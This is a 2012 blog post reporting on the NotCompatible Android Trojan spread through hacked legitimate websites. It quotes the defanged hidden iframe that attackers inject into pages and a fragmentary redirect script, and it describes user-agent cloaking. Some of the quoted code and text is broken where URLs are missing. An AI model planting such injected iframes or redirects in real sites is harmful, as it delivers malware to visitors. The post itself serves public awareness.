Friday 18 May 2012

Just when you thought it was safe to web surf on your Android device…

It might be safe to say that April 2012 will go down in history as the month we realized Macs are not virus-proof. If that’s the case, then May 2012 will go down as the month we realized smartphones aren’t safe either.

For the first time, experts have located legitimate sites that have been hacked and infected with Android drive-by-download malware.

“Drive-by-download” malware is harmful software that is automatically downloaded when a particular website is visited. In this case, the malware, a Trojan called NotCompatible, specifically infects Android devices. It’s important to note that the relevant piece of this story is the fact that the malware was found on legitimate websites that had been hacked and infected.

Hacked websites commonly have the following code inserted into the bottom of each page:

<iframe style="visibility: hidden; display: none; display: none;" src="hxxp://{1234567890-0000-DEAD-BEEF-133713371337}"></iframe>

When a PC-based web browser accesses the site in question, it returns a “not found” error. When a browser with the word “Android” in its user-agent header accesses the site, however, the following is returned:

<html><head></head><body><script type="text/javascript"> = "hxxp://";</script></body></html>

As a result, the browser immediately attempts to access the page at Like the previous site, only browsers with the word “Android” in their user-agent string will trigger a download; all other browsers will show a blank page. Since the server returns an Android app, the Android browser automatically downloads it. [ZDNet]

Up until now, the Android DBD Malware had been found only on websites designed by malware distributors specifically for the purpose of hosting the program. The fact that the software is now found on legitimate websites opens the door for large-scale infections.

Presently, the malware presents no known negative effects, but experts believe the current infections are part of a trial run to test the viability of mass distribution. 

No comments:

Post a Comment